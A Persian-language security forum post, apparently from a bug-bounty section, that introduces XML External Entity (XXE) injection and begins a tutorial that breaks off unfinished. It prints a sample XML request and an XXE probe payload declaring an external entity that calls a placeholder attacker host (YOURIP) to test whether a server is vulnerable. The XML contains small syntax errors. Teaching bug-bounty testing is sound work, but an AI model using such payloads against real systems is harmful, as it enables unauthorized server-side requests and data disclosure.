انجمن تیم امنیتی ایران سایبر

آسیب پذیری Xxe در باگ بانتی (bug Bounty)

شروع موضوع توسط 1314CK.0FF3NSIV3 ‏11/1/20 در انجمن باگ بانتی (Bug Bounty)

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. 1314CK.0FF3NSIV3

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏16/8/15
    ارسال ها:
    16
    تشکر شده:
    38
    جنسیت:
    Name:
    Nothing
    Main os:
    Ubuntu
    باسلام

    index.png

    در آسیب پذیری XXE ویا XML External Entity Injection به حمله ای اطلاق می شود که ورودی XML را در وهله اول تجزیه شود . این حمله زمانی رخ می دهد که ورودی XML حاوی وجود یک حمله خارجی توسط یک تجزیه کننده XML صورت بگیرد که بدلیل پیکربندی نامناسب داخل سرور پردازش شود. بنابراین حمله منجر به نشراطلاعات محرمانه ، حملات تکذیب سرویس ، جعل درخواست سمت سرور ، اسکن پورت و ضربات حملاتی که بعد از نیز ممکن است به همراه داشته باشد .

    فرض می کنیم ما یک آسیب پذیری XXE پیدا کرده ایم که محتوای زیر را در درخواست POST به برنامه ارسال می کند:

    کد:
    <?xml version=”1.0″ encoding=”ISO-8859-1″?>
    
    <Prod>
    
    <Prod>
    
    <Type>test</type>
    
    <name>iran-cyber</name>
    
    <id>21</id>
    
    </Prod>
    
    </Prod>


    بررسی حمله که ببینید آسیب پذیر است یا خیر :
    روش 1 - شناسایی سرور آسیب پذیر با استفاده از نهاد SYSTEM:

    اولین قدم ببینیم آیا میتوانیم درخواستی را با ارسال یک فایل لوکال روی سرور تارگت انجام بدیم یا نه ؟! برای اینکار، با استفاده از SYSTEM استفاده می کنیم:

    کد:
    <?xml version=”1.0″ encoding=”ISO-8859-1″?>
    
    <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM “http://YOURIP/TEST.ext” >]>
    
    <Prod>
    
    <Prod>
    
    <Type>test</type>
    
    <name>iran-cyber</name>
    
    <id>&xxe</id>
    
    </Prod>
    
    </Prod>
    ادامه دارد ....
     
    blackops از این پست تشکر کرده است.
بارگذاری...

کاربرانی که از تاپیک دیدن کرده اند (کل: 9)

  1. Enetpropo
  2. 1314CK.0FF3NSIV3
  3. FuzzyFord
  4. sc0rpi0n
  5. hackerman1
  6. Juaninator
  7. DawnInAllah
  8. blackops
  9. Monocots57
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .